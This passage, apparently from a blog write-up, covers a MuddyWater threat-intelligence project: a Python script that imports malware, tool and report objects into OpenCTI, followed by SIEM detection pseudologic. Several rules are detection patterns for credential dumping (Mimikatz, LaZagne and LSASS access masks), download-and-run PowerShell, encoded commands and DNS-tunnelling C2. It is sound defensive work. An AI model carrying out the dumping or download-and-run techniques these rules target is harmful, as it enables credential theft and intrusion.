"AnchorRAT",   "aliases": [],             "description": "Custom RAT (2024); COM hijacking persistence (T1546.015)."},<br>    {"name": "SyncroRAT",   "aliases": [],             "description": "RMM-based RAT; Technion campaign (Feb 2023); Log4j initial access."},<br>    {"name": "DarkBit",     "aliases": [],             "description": "Ransomware/wiper; Technion attack; vssadmin shadow copy deletion."},<br>]<br>MALWARE_IDS = {}<br>for m in MALWARE_CATALOG:<br>    existing = _find(api.malware, m["name"])<br>    if existing:<br>        MALWARE_IDS[m["name"]] = existing["id"]<br>    else:<br>        obj = api.malware.create(<br>            name=m["name"], aliases=m["aliases"],<br>            description=m["description"], is_family=False,<br>            objectMarking=[TLP_WHITE], createdBy=MOIS_ID,<br>        )<br>        MALWARE_IDS[m["name"]] = obj["id"]<br># ── Step 4: Tool catalog ──────────────────────────────────────────────────────<br>TOOL_CATALOG = [<br>    {"name": "AteraAgent",  "aliases": ["Atera RMM"], "description": "Commercial RMM abused for persistent remote access via phishing."},<br>    {"name": "SimpleHelp",  "aliases": [],            "description": "Commercial RMM abused in 2024 Israeli targeting."},<br>    {"name": "Mimikatz",    "aliases": [],            "description": "LSASS credential dumping (T1003.001), used with procdump64.exe."},<br>    {"name": "LaZagne",     "aliases": [],            "description": "LSA secrets (T1003.004) and cached domain credential dumping (T1003.005)."},<br>]<br>TOOL_IDS = {}<br>for t in TOOL_CATALOG:<br>    existing = _find(api.tool, t["name"])<br>    if existing:<br>        TOOL_IDS[t["name"]] = existing["id"]<br>    else:<br>        obj = api.tool.create(<br>            name=t["name"], aliases=t["aliases"],<br>            description=t["description"],<br>            objectMarking=[TLP_WHITE], createdBy=MOIS_ID,<br>        )<br>        TOOL_IDS[t["name"]] = obj["id"]<br># ── Step 5: uses relationships ────────────────────────────────────────────────<br>for mid in MALWARE_IDS.values():<br>    link(MW_ID, mid, "uses", 80)<br>for tid in TOOL_IDS.values():<br>    link(MW_ID, tid, "uses", 80)<br># ── Step 6: Reports from sources.yaml ────────────────────────────────────────<br>SOURCE_DATES = {<br>    "src_usgov_aa22_055a_pdf_mirror":        "2022-02-24T00:00:00.000Z",<br>    "src_incd_muddywater_darkbit_2023":      "2023-02-07T00:00:00.000Z",<br>    "src_incd_muddywater_2024_evolution":    "2024-06-01T00:00:00.000Z",<br>    "src_cisa_aa22_055a_page":               "2022-02-24T00:00:00.000Z",<br>    "src_ncsc_uk_muddywater_joint_advisory": "2022-02-24T00:00:00.000Z",<br>    "src_incd_recent_phishing_1947":         "2024-09-01T00:00:00.000Z",<br>    "src_mitre_attack_muddywater_g0069":     "2024-01-01T00:00:00.000Z",<br>}<br>REPORT_IDS = {}<br>for src in SOURCES:<br>    src_id   = src["id"]<br>    title    = src["title"]<br>    pub_date = SOURCE_DATES.get(src_id, "2023-01-01T00:00:00.000Z")<br>    confidence = 85 if src.get("source_reliability") == "A" else 70<br>    description = (<br>        f"Publisher: {src['publisher']}\n"<br>        f"Reliability: {src.get('source_reliability','?')} / "<br>        f"Credibility: {src.get('information_credibility','?')}\n"<br>        f"URL: {src['url']}\n"<br>        f"Actor claims: {', '.join(src.get('actor_claims', []))}\n"<br>        f"ATT&amp;CK candidates: {', '.join(src.get('candidate_attck_techniques', []))}"<br>    )<br>    existing = _find(api.report, title)<br>    if existing:<br>        REPORT_IDS[src_id] = existing["id"]<br>    else:<br>        obj = api.report.create(<br>            name=title, published=pub_date,<br>            description=description,<br>            report_types=["threat-report"],<br>            confidence=confidence,<br>            objectMarking=[TLP_WHITE],<br>            createdBy=MOIS_ID,<br>            objects=[MW_ID],<br>        )<br>        REPORT_IDS[src_id] = obj["id"]<br># ── Step 7: ATT&amp;CK pattern links from procedures ──────────────────────────────<br>linked, stubs = set(), []<br>for proc in PROCEDURES:<br>    for candidate in proc.get("attck_candidates", []):<br>        tid = candidate["technique"]<br>        if tid in linked:<br>            continue<br>        pattern_id, created_as_stub = find_or_create_attack_pattern(tid)<br>        link(MW_ID, pattern_id, "uses", 75)<br>        linked.add(tid)<br>        if created_as_stub:<br>            stubs.append(tid)<br># ── Summary ───────────────────────────────────────────────────────────────────<br>print(f"Import complete - malware: {len(MALWARE_IDS)}, tools: {len(TOOL_IDS)}, "<br>      f"reports: {len(REPORT_IDS)}, ATT&amp;CK links: {len(linked)}, stubs: {len(stubs)}")<br></pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WMvnfWfF50hj3Rk60DBAxA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XMTEbgDPokzU9iTK3sjEww.png"></figure><p><strong>Result:</strong> All objects created. Re-run confirms idempotency (no duplicates).</p><h4>Step 13: Intrusion Set Verification</h4><p><strong>Result:</strong> MuddyWater entity with all aliases, Iran MOIS attribution relationship, campaign links, and malware/tool associations confirmed in OpenCTI.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5KWUHIP3nkUhF6wpQpDa3g.png"></figure><h4>Step 14: Knowledge Graph</h4><p><strong>Result:</strong> Graph shows MuddyWater → 9 malware, 4 tools, 3 campaigns, 21 ATT&amp;CK techniques — all with source-annotated relationship edges.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-B2D00HhbhmdA5rtGm7klA.png"></figure><h4>Step 15: ATT&amp;CK Matrix Coverage</h4><p><strong>Result:</strong> 21 techniques highlighted across 8 tactics in the ATT&amp;CK Enterprise matrix.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4XphzS2vtf-peVJ-ArTglg.png"></figure><h4>Step 16: BugSleep Malware Detail</h4><p><strong>Result:</strong> BugSleep malware object with INCD 2024 source annotation, T1053.005 relationship (43-minute task), and C2 technique links confirmed.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*3rt63a6jCO_-fk-BLdyaTw.png"></figure><h4>Step 17: Reports List</h4><p><strong>Result:</strong> 20 report objects, one per promoted source. Each report links to the procedures and techniques it evidences.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-Ej71hGDspW3ahdqZWATAA.png"></figure><h4>Step 19: OpenCTI Dashboard</h4><p><strong>Result:</strong> Custom dashboard showing technique frequency heatmap by source tier — highest-corroborated techniques visible at a glance.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_HccHBJxzb-ZZu93WImMhg.png"></figure><h3>Phase 4: Detection Atlas</h3><p>The detection atlas is the core analytical output. Each of the 11 detection records in <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/data/detections.yaml">data/detections.yaml</a> contains:</p><ul><li>The specific MuddyWater behavior it targets (not the ATT&amp;CK technique category)</li><li>Required log sources and capability gates</li><li>Multi-rule pseudologic (SIEM-agnostic — works as a template for Sigma, KQL, SPL, or any rule format)</li><li>False positive classes and tuning guidance</li><li>A creation_logic field explaining <em>why</em> the rule is designed this way — the design decision, not just what the rule does</li></ul><p>Coverage scores follow a strict scale: <strong>5</strong> = lab-validated with a Kibana screenshot. <strong>4</strong> = correlated analytic (good logic, single source or partial lab). <strong>3</strong> = behavioral detection with partial validation. A score of 5 requires a proof, not just passing pseudologic.</p><p><strong>Step 20 — Analyst Review</strong></p><p>Before any detection went to validation, every record went through a review pass that checked: operator precedence in multi-clause conditions, access mask completeness for LSASS detection, path allowlist accuracy for the GoogleUpdate/Goopdate IoC, and ATT&amp;CK technique coverage gaps. The review fixed a real operator precedence bug in det_mw_0010 Rule B where the command_line clause was outside the event_type guard, tightened the LSASS access mask set, improved T1033 coverage in det_mw_0009 Rule C via Win32_ComputerSystem, and added the x86/x64 Google installation path allowlist to det_mw_0004 Rule A.</p><h4>det_mw_0001 — Email Delivery Correlated with Process Spawn</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/796/1*ycAoCbrkdxo6oxx4X0Gkhw.png"></figure><p><em>Techniques: T1566.001, T1566.002 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater delivers malicious content three ways — ZIP or Office macro attachments, links to Egnyte/OneDrive delivering RMM installers, and emails from compromised accounts. Corroborated by CISA AA22–055A, INCD 2023, and INCD 2024. The highest-priority initial access vector in the dataset.</p><p><strong>Why it’s built this way:</strong> Email delivery alone is not a detection signal — MuddyWater’s phishing emails are indistinguishable from legitimate mail at the gateway layer. The detection value comes from correlating delivery with a process spawn on the recipient endpoint within a tight 5-minute window. The parent process constraint (Outlook, browser) is the key limiter: it restricts scope to email-triggered or link-triggered execution, which is exactly the documented delivery chain. Both attachment-based and link-based delivery methods are covered because all variants are source-confirmed. The correlated logic type reflects that neither event alone is sufficient — only the combination is meaningful.</p><p><strong>Required telemetry:</strong> Email gateway or SEG with attachment metadata and URL extraction. EDR or Sysmon Event ID 1 with parent image and command line. Without the gateway telemetry, this detection degrades to parent-process heuristics only and loses the delivery-correlation value.</p><pre>event_type IN [email_delivery] AND<br>  (attachment.extension IN ["zip","xlsx","xlsm","pdf","docm"] OR<br>   link.domain IN ["egnyte.com","onedrive.live.com","1drv.ms"])<br>CORRELATE WITHIN 300 seconds WITH<br>event_type IN [process_create] WHERE<br>  parent_image IN ["OUTLOOK.EXE","chrome.exe","firefox.exe","msedge.exe"] AND<br>  image IN ["powershell.exe","cmd.exe","wscript.exe","mshta.exe",<br>            "AteraAgent.exe","ScreenConnect.exe","SimpleHelp.exe","rport.exe"]</pre><p><strong>Key false positives:</strong> Legitimate macro-enabled Office files from internal users. IT-approved RMM tools deployed via email links during onboarding. Tune by excluding known sender domains and approved RMM deployment windows.</p><h4>det_mw_0002 — Web Service Spawning Interpreter Shell</h4><p><em>Techniques: T1190 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater uses public-facing exploitation as a secondary initial access vector — CVE-2020–0688 (Exchange), CVE-2020–1472 (Netlogon/Zerologon), CVE-2021–44228 (Log4j), and unspecified VPN vulnerabilities from INCD 2024.</p><p><strong>Why it’s built this way:</strong> The detection targets the post-exploitation moment — a web service spawning a shell — rather than the exploit payload itself. This is deliberately CVE-agnostic: it fires on CVE-2020–0688, CVE-2020–1472, Log4j, and any unnamed VPN vulnerability without needing individual exploit signatures. The parent process list maps directly to the documented CVEs: w3wp.exe covers Exchange and IIS, java.exe covers Log4j, lsass.exe covers Netlogon exploitation leading to SYSTEM-level shell creation. The SYSTEM integrity level filter is the key noise reducer — legitimate administrative scripts rarely run at SYSTEM under IIS application pools without a clear documented reason.</p><p><strong>Required telemetry:</strong> EDR or Sysmon Event ID 1 with full parent-child chain and integrity level. IDS/IPS for CVE-specific signatures as a complementary layer.</p><pre>event_type = process_create AND<br>parent_image IN ["w3wp.exe","java.exe","lsass.exe","services.exe",<br>                 "vmtoolsd.exe","vpnagent.exe"] AND<br>image IN ["cmd.exe","powershell.exe","wscript.exe","cscript.exe","bash.exe"] AND<br>(parent_user IN ["NETWORK SERVICE","IIS_IUSRS","SYSTEM"] OR<br> integrity_level = "System")</pre><p><strong>Key false positives:</strong> Legitimate administrative scripts under IIS application pools. Java-based monitoring agents that spawn processes. Tune by process hash allowlisting for known-good management tools.</p><h4>det_mw_0003 — PowerShell Encoded Command and Script Obfuscation</h4><p><em>Techniques: T1059.001, T1027 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> PowerShell obfuscation is a cross-cutting technique present in every MuddyWater tool tier — PowGoop (Base64 C2 setup), POWERSTATS (IEX + web request for stage delivery), and the 2024 lure campaigns (embedded API key executed via PowerShell). Three distinct usage patterns across tools required three rules.</p><p><strong>Why it’s built this way:</strong> Each rule targets a different MuddyWater PowerShell pattern with a different telemetry requirement.</p><p>Rule A targets PowGoop and POWERSTATS loader delivery. The regex \s-e[a-zA-Z]*\s+[A-Za-z0-9+/=]{50,} is deliberately written to match all unambiguous prefix forms of -EncodedCommand (-e, -ec, -en, -enc) while the 50-character minimum for the Base64 blob avoids matching the -Encoding parameter. This is the operator precision that matters: -Encoding UTF8 would otherwise match a naive regex.</p><p>Rule B targets POWERSTATS script execution behavior: IEX combined with a web request. This is the decoded content layer — it requires Script Block Logging (Event ID 4104), which is the capability gate that determines whether this detection class exists at all in a given environment.</p><p>Rule C is the delivery-context fallback: PowerShell spawned by an Office application, email client, or browser has no legitimate explanation in a standard enterprise environment and fires regardless of whether Script Block Logging is enabled.</p><p><strong>Required telemetry:</strong> Script Block Logging (Event ID 4104) — required for Rule B and for the highest-fidelity version of this detection. Sysmon Event ID 1 for Rules A and C. Without Script Block Logging, the detection degrades to command-line heuristics only.</p><pre># Rule A — Encoded command flag (all prefix forms: -e, -ec, -en, -enc ...)<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>command_line IMATCHES "\s-e[a-zA-Z]*\s+[A-Za-z0-9+/=]{50,}"</pre><pre># Rule B — Script Block content (Event ID 4104)<br>event_type = script_block_log AND<br>script_block_text MATCHES "(IEX|Invoke-Expression|InvokeScript)" AND<br>script_block_text MATCHES "(WebClient|Invoke-WebRequest|DownloadString|Net\.Http)"</pre><pre># Rule C — Suspicious parent process<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>parent_image IN ["OUTLOOK.EXE","winword.exe","excel.exe",<br>                 "chrome.exe","firefox.exe","msedge.exe","WScript.exe"]</pre><p><strong>Key false positives:</strong> Administrative scripts using -EncodedCommand for special characters. SCCM/Ansible deployments running Base64-encoded payloads. Baseline known-good encoded commands by hash before alerting on Rule A.</p><h4>det_mw_0004 — Unsigned DLL Loaded by Signed Executable</h4><p><em>Techniques: T1574.002 · Score: 3 (behavioral, partial validation)</em></p><p><strong>What it targets:</strong> PowGoop’s execution method — a malicious DLL renamed Goopdate.dll placed alongside GoogleUpdate.exe, causing the legitimate signed binary to load it. Confirmed in 2024 toolset by INCD 2024.</p><p><strong>Why it’s built this way:</strong> Two rules serve different confidence tiers. Rule A is sourced directly from the documented PowGoop technique: the specific process name (GoogleUpdate.exe), DLL name (Goopdate.dll), and the fact that any path outside the Google installation directories is anomalous. The allowlist covers both x86 and x64 installation paths because omitting either creates a bypass. This combination — specific binary, specific DLL name, path outside expected directory — is near-unique and fires with high precision. Rule B is the generic behavioral net for future DLL side-loading variants where the actor may use different binary names — it trades precision for coverage against toolset evolution.</p><p>Score is 3 (not 5) because the lab’s stub DLL did not produce sufficient Sysmon EID 7 signal during validation. The detection logic is sound; the telemetry dependency (Sysmon image load events with signing status) is the constraint.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 7 (ImageLoad) with signed/unsigned status — this is the hard dependency. Without it, DLL loads are invisible to SIEM-based detection.</p><pre># Rule A — Specific IoC: GoogleUpdate loading Goopdate from non-Google path<br>event_type = image_load AND<br>image ENDSWITH "GoogleUpdate.exe" AND<br>loaded_image ENDSWITH "Goopdate.dll" AND<br>NOT (loaded_image_path STARTSWITH "C:\Program Files (x86)\Google\" OR<br>     loaded_image_path STARTSWITH "C:\Program Files\Google\")</pre><pre># Rule B — Generic: signed process loading unsigned DLL from user-writable path<br>event_type = image_load AND<br>process_signed = true AND<br>loaded_image_signed = false AND<br>loaded_image_path MATCHES "(\\Users\\|\\AppData\\|\\Temp\\|\\ProgramData\\)"</pre><p><strong>Key false positives:</strong> Third-party software shipping unsigned DLLs alongside signed executables (common). Developer workstations with locally compiled DLLs. Rule B requires environment-specific tuning before production deployment.</p><h4>det_mw_0005 — Registry Run Key and Startup Folder Persistence</h4><p><em>Techniques: T1547.001 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> Multiple MuddyWater malware families use Run key persistence with actor-specific value names. Small Sieve: OutlookMicrosift (deliberate typo mimicking Microsoft). AA22-055A documents a second key: SystemTextEncoding. Canopy installs a WSF script in the startup folder — a sub-technique that doesn't appear as a Run key write.</p><p><strong>Why it’s built this way:</strong> Three rules cover three distinct persistence mechanisms across the malware catalog. Rule A is an exact-match IoC alert on the two named value names — it fires immediately on any match without needing path or parent context, because these specific strings have no legitimate usage in a standard enterprise environment. Rule B is the behavioral safety net for unknown or renamed values: path heuristic (AppData/Temp) combined with a non-installer parent covers the common pattern of malware writing its own persistence without using an installer. The process_integrity_level filter removes high-integrity (admin-level) processes from the behavioral rule because legitimate software installers typically run elevated. Rule C is added specifically to cover Canopy's startup folder WSF persistence, which doesn't show up as a Run key write at all — it's a file creation event.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 13 (registry value set) for Rules A and B. Sysmon Event ID 11 (file create) for Rule C.</p><pre># Rule A — Specific IoC: known MuddyWater Run key value names<br>event_type = registry_set AND<br>registry_key MATCHES "\\CurrentVersion\\Run" AND<br>registry_value_name IN ["OutlookMicrosift","SystemTextEncoding"]<br><br><br># Rule B - Behavioral: Run key pointing to writable/unusual path<br>event_type = registry_set AND<br>registry_key MATCHES "(HKCU|HKLM)\\.*\\CurrentVersion\\Run" AND<br>registry_value_data MATCHES "(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\)" AND<br>process_image NOT IN ["msiexec.exe","setup.exe","install.exe","update.exe"] AND<br>process_integrity_level NOT IN ["High","System"]<br># Rule C - Script files written to startup folder (covers Canopy WSF)<br>event_type = file_create AND<br>file_path MATCHES "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" AND<br>file_extension IN ["wsf","vbs","js","ps1","bat","cmd"]</pre><p><strong>Key false positives:</strong> Rule A has essentially zero false positives on the specific value names. Rule B requires installer process exclusion — the list is environment-specific. Rule C may fire on legitimate startup scripts deployed by IT via Group Policy; exclude by file hash or signer.</p><h4>det_mw_0006 — Scheduled Task with 43-Minute Beacon Interval</h4><p><em>Techniques: T1053.005 · Score: 4 (correlated analytic)</em></p><p><strong>What it targets:</strong> BugSleep creates a Windows scheduled task triggered every 43 minutes for C2 beaconing — a specific behavioral fingerprint documented in the INCD 2024 report. The interval is documented as customizable, but 43 minutes is the observed operational value.</p><p><strong>Why it’s built this way:</strong> The 43-minute interval is the single most precise artifact in the entire procedure dataset. Rule A is designed as a high-fidelity immediate alert requiring no tuning: PT43M is the ISO 8601 duration format for 43 minutes and appears verbatim in the Windows Task XML. This fires with near-zero false positives because no legitimate software uses a 43-minute repeat interval for any standard purpose. Rule B generalizes the pattern for future BugSleep variants that may use a different interval: short repetition (under 60 minutes) combined with a task action pointing to a user-writable path is anomalous regardless of exact interval. Rule C is the telemetry fallback — many environments do not forward Task Scheduler event logs to SIEM, but schtasks.exe process creation (Sysmon EID 1) is more commonly collected and captures the command line.</p><p>Score is 4 (not 5) because this is a single-source procedure — INCD 2024 only. Before treating Rule A as a high-confidence production alert, corroborate with a second vendor source.</p><p><strong>Required telemetry:</strong> Windows Security Event ID 4698 (scheduled task created) or Task Scheduler operational log for Rules A and B. Sysmon Event ID 1 for Rule C.</p><pre># Rule A — Specific: 43-minute interval (BugSleep artifact) — immediate alert<br>event_type = scheduled_task_created AND<br>task_trigger_repetition_interval = "PT43M"<br><br># Rule B - Behavioral: short interval + suspicious action path<br>event_type = scheduled_task_created AND<br>task_trigger_repetition_interval_minutes &lt; 60 AND<br>task_action_path MATCHES "(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\)" AND<br>creating_process NOT IN ["svchost.exe","taskeng.exe","msiexec.exe"]<br># Rule C - Sysmon command line fallback<br>event_type = process_create AND<br>image ENDSWITH "schtasks.exe" AND<br>command_line MATCHES "/create" AND<br>command_line MATCHES "(AppData|Temp|ProgramData)"</pre><p><strong>Key false positives:</strong> Backup and monitoring software creating frequent tasks. Browser update mechanisms. Rule B requires interval baseline per environment before production deployment.</p><h4>det_mw_0007 — RMM Tool Executed from User-Writable Path</h4><p><em>Techniques: T1219 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> RMM tool abuse is the most consistently documented MuddyWater technique across all source tiers — five independent government and vendor sources corroborate it. Tool inventory across campaigns: ScreenConnect (2022), SyncroRAT (Israel 2023), rport.exe (DarkBit operation), AteraAgent (multiple sources), SimpleHelp, Level, PDQConnect (2024).</p><p><strong>Why it’s built this way:</strong> RMM tool detection is inherently a context problem. The binary is legitimate. The network traffic to vendor infrastructure is legitimate. Only the delivery chain and execution path are anomalous. Three rules address this from different angles.</p><p>Rule A uses path as the primary signal: a legitimately IT-deployed RMM tool installs to Program Files or a managed path, not AppData/Temp/Downloads. A known RMM binary executing from a user-writable path means it was delivered, not installed by IT.</p><p>Rule B uses parent process as the signal: no legitimate RMM deployment is spawned by Outlook, a browser, or an archive utility. This is the delivery-context constraint — if an RMM binary’s parent is OUTLOOK.EXE, the delivery chain is phishing regardless of what the binary is.</p><p>Rule C uses network destination: RMM infrastructure connections from endpoints with no authorized RMM deployment are anomalous. Rules A+C together — RMM binary from writable path plus outbound connection to vendor domain — form the highest-confidence combined signal.</p><p><strong>The baseline prerequisite is non-negotiable.</strong> Rule C without a baseline of authorized RMM deployments per endpoint generates constant noise in any environment that legitimately uses RMM tools. This is the single highest-ROI detection in the dataset if the baseline is clean.</p><p><strong>Required telemetry:</strong> EDR or Sysmon Event ID 1 with parent image and file path. Network flow or proxy logs with process name attribution for Rule C.</p><pre># Rule A — Known RMM binary from non-standard installation path<br>event_type = process_create AND<br>(image ENDSWITH "AteraAgent.exe" OR<br> image ENDSWITH "ScreenConnect.exe" OR<br> image ENDSWITH "SimpleHelp.exe" OR<br> image ENDSWITH "rport.exe" OR<br> image ENDSWITH "SyncroRAT.exe" OR<br> image ENDSWITH "Level.exe" OR<br> image ENDSWITH "PDQConnect.exe") AND<br>image_path MATCHES "(\\AppData\\|\\Temp\\|\\Downloads\\|\\Users\\[^\\]+\\Desktop\\)"<br><br># Rule B - RMM binary spawned by email client or browser<br>event_type = process_create AND<br>(image ENDSWITH "AteraAgent.exe" OR image ENDSWITH "ScreenConnect.exe" OR<br> image ENDSWITH "SimpleHelp.exe" OR image ENDSWITH "rport.exe") AND<br>parent_image IN ["OUTLOOK.EXE","outlook.exe","chrome.exe","firefox.exe",<br>                 "msedge.exe","7zFM.exe","WinRAR.exe","explorer.exe"]<br># Rule C - Outbound connection to RMM vendor infrastructure from unexpected endpoint<br>event_type = network_connection AND<br>destination_domain MATCHES "(atera\.com|screenconnect\.com|simplehelp\.net|syncromsp\.com)" AND<br>source_process NOT IN [known_rmm_processes_baseline]</pre><p><strong>Key false positives:</strong> All RMM tools are legitimate software — the entire detection depends on delivery context and path. Authorized deployments must be baselined per endpoint before any rule produces useful signal. Help desk technicians installing RMM from their downloads folder will match Rule A; exclude by user account or machine type.</p><h4>det_mw_0008a — Non-Browser Process Connecting to Telegram Bot API</h4><p><em>Techniques: T1071.001, T1102 · Score: 3 (behavioral, partially validated)</em></p><p><strong>What it targets:</strong> Small Sieve beacons exclusively via the Telegram Bot API (api.telegram.org) over HTTPS. This is one of the most specific C2 channels documented for MuddyWater — a fixed, known hostname with no CDN rotation.</p><p><strong>Why it’s built this way:</strong> The detection is single-rule because the signal is specific enough not to need graduated fallbacks. api.telegram.org is a fixed hostname. The discriminating condition is not the domain but the process: in enterprise environments where Telegram is not a standard application, any process connecting to this endpoint is anomalous. The approach is deliberately narrow — it will miss if MuddyWater switches from Telegram to another messaging API, but fires with high precision on the documented Small Sieve C2 channel.</p><p>Score is 3 because VirtualBox NAT blocked outbound Telegram connections in the lab, preventing full Kibana validation of the network connection event.</p><p><strong>Required telemetry:</strong> DNS query logs or network flow logs with process name attribution. In environments without process-attributed network telemetry, this degrades to a domain-based alert with no process context.</p><pre>event_type = network_connection AND<br>destination_domain = "api.telegram.org" AND<br>destination_port = 443 AND<br>source_process NOT IN ["Telegram.exe","telegram.exe","chrome.exe",<br>                        "firefox.exe","msedge.exe","iexplore.exe"]</pre><p><strong>Key false positives:</strong> Telegram desktop application where it is approved. Bot developers testing scripts from dev workstations. In organizations where Telegram is standard, strict process allowlisting is required before this detection is useful.</p><h4>det_mw_0008b — DNS Tunneling Volume and Entropy</h4><p><em>Techniques: T1572 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> Mori, MuddyWater’s DNS-tunneling backdoor, uses DNS queries as the C2 channel. DNS tunneling encodes data in subdomain labels, producing distinctive patterns: high query volume to a single domain, unusually long subdomain strings, and high Shannon entropy in the label content.</p><p><strong>Why it’s built this way:</strong> DNS tunneling detection cannot rely on a single heuristic because each heuristic has a different failure mode. Volume (Rule A) catches high-throughput tunneling but misses slow/low-rate tools that deliberately throttle to blend in. Label length (Rule B) catches encoded payloads regardless of rate or entropy but misses short encoded segments. Entropy (Rule C) catches random-looking subdomains at any length and rate but produces noise on CDN hash labels without a comprehensive baseline. The three rules are additive — any single trigger warrants investigation, two or more from the same source are high-confidence.</p><p>The thresholds (&gt;100 queries per 60 seconds, &gt;40-character labels, &gt;3.5 Shannon entropy) were validated in the lab by generating 180 DNS queries with 42-character random subdomains from the simulation playbook.</p><p><strong>Required telemetry:</strong> DNS resolver logs with full QNAME — not available in all environments. If only DNS flow logs (not query content) are available, Rule B and Rule C are unavailable.</p><pre># Rule A — High query volume to single parent domain<br>event_type = dns_query<br>GROUP BY source_ip, query_domain_parent<br>HAVING COUNT(*) &gt; 100 WITHIN 60 seconds<br><br># Rule B - Long subdomain labels (&gt;40 chars indicates encoded payload)<br>event_type = dns_query AND<br>LENGTH(subdomain_label) &gt; 40<br># Rule C - High entropy subdomains (random-looking encoded content)<br>event_type = dns_query AND<br>SHANNON_ENTROPY(subdomain_label) &gt; 3.5 AND<br>subdomain_label NOT IN [known_cdn_domains_baseline]</pre><p><strong>Key false positives:</strong> CDN domains using hash-based subdomains (Akamai, Cloudflare, AWS) — require comprehensive allowlist for Rule C. DNSSEC validation traffic with long encoded keys. Calibrate thresholds against your specific environment’s DNS baseline before deploying Rule A in production.</p><h4>det_mw_0009 — WMI SecurityCenter2 Discovery Survey</h4><p><em>Techniques: T1047, T1082, T1016, T1033, T1518.001 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> CISA AA22–055A reproduces the exact PowerShell survey script MuddyWater uses post-access: a WMI query chain that collects IP addresses (Win32_NetworkAdapterConfiguration), OS name and architecture (Win32_OperatingSystem), hostname, domain, username (Win32_ComputerSystem), and AV product names (root\SecurityCenter2\AntiVirusProduct). The collected data is assembled into a delimited string, encoded, and sent to C2.</p><p><strong>Why it’s built this way:</strong> The detection anchors on SecurityCenter2\AntiVirusProduct because it is the highest-specificity WMI class in the documented survey. The other classes — OS name, IP addresses, hostname — are queried by dozens of legitimate monitoring tools. AntiVirusProduct enumeration has a much smaller legitimate caller population: primarily AV management consoles and endpoint security platforms. This makes it the most reliable low-noise signal from the full survey chain.</p><p>Three rules are layered by telemetry quality. Rule A requires Script Block Logging (highest fidelity, decoded script content visible). Rule B falls back to command-line logging — medium fidelity, only fires if SecurityCenter2 appears in the literal command line, not in a decoded payload. Rule C is the most specific: a multi-class pattern that matches the complete documented survey chain, covering all five ATT&amp;CK techniques in a single event. T1033 coverage was added to Rule C via Win32_ComputerSystem during the analyst review pass — it was missing from the initial draft.</p><p>Rule C matches the CISA-documented script closely enough to be treated as near-exact-match when observed.</p><p><strong>Required telemetry:</strong> Script Block Logging (Event ID 4104) — required for Rules A and C. Sysmon Event ID 1 for Rule B.</p><pre># Rule A — Script Block captures SecurityCenter2 query<br>event_type = script_block_log AND<br>script_block_text MATCHES "SecurityCenter2" AND<br>script_block_text MATCHES "AntiVirusProduct"<br><br># Rule B - Process command line contains SecurityCenter2 (fallback without SBL)<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>command_line MATCHES "SecurityCenter2"<br># Rule C - Full survey pattern: all 5 ATT&amp;CK techniques in one event<br># T1518.001 (AV enum) + T1016 (network config) + T1082 (OS info) + T1033 (username)<br>event_type = script_block_log AND<br>script_block_text MATCHES "SecurityCenter2" AND<br>script_block_text MATCHES "Win32_NetworkAdapterConfiguration" AND<br>script_block_text MATCHES "Win32_OperatingSystem" AND<br>script_block_text MATCHES "(Win32_ComputerSystem|Win32_UserAccount|UserName)"</pre><p><strong>Key false positives:</strong> AV management software and endpoint security platforms querying SecurityCenter2. IT inventory tools (Lansweeper, SCCM hardware inventory). Exclude by process hash or signer rather than by process name, since attackers can rename their scripts.</p><h4>det_mw_0010 — LSASS Memory Access and Credential Tool Execution</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/699/1*J0Q8ExDAG7jBY7duoI35MA.png"></figure><p><em>Techniques: T1003.001, T1003.004, T1003.005 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater performs credential access using three tools documented in CISA AA22–055A: Mimikatz and procdump64.exe against LSASS memory (T1003.001), and LaZagne for LSA secrets (T1003.004) and cached domain credentials (T1003.005).</p><p><strong>Why it’s built this way:</strong> Three independent rules cover the full credential dumping lifecycle, each with a different detection philosophy.</p><p>Rule A is the design priority: a process accessing LSASS memory is the universal pre-condition for any LSASS dump, regardless of tool. Detecting the access event (Sysmon EID 10) rather than the tool name means Rule A fires on Mimikatz, procdump, custom C++ loaders, and any future variant — as long as the access mask is in the covered set. The access masks were sourced from established Mimikatz research (0x1010, 0x1410, 0x1438, 0x143a, 0x1418) and extended with 0x1fffff (PROCESS_ALL_ACCESS, used by custom dumpers) and 0x1f0fff (another all-access variant observed in the field). The exclusion list covers known legitimate callers — AV engines, CSrss, WinInit — without which this rule generates constant noise from endpoint security products.</p><p>Rule B is the name-based backstop. Lower fidelity because it misses renamed tools, but catches actors using stock Mimikatz. The analyst review pass re-bracketed the command_line clause to keep it inside the event_type guard — a real operator precedence bug that would have caused the command-line check to match events outside the process_create filter.</p><p>Rule C catches the dump artifact on disk — a final fallback when process-level events are unavailable. .dmp files in user-writable paths are anomalous outside of Windows Error Reporting, which writes to a fixed known path.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 10 (ProcessAccess) with explicit lsass.exe targeting in the Sysmon configuration — this is not enabled by default. Without it, Rule A does not exist. Sysmon Event ID 1 for Rule B. Sysmon Event ID 11 for Rule 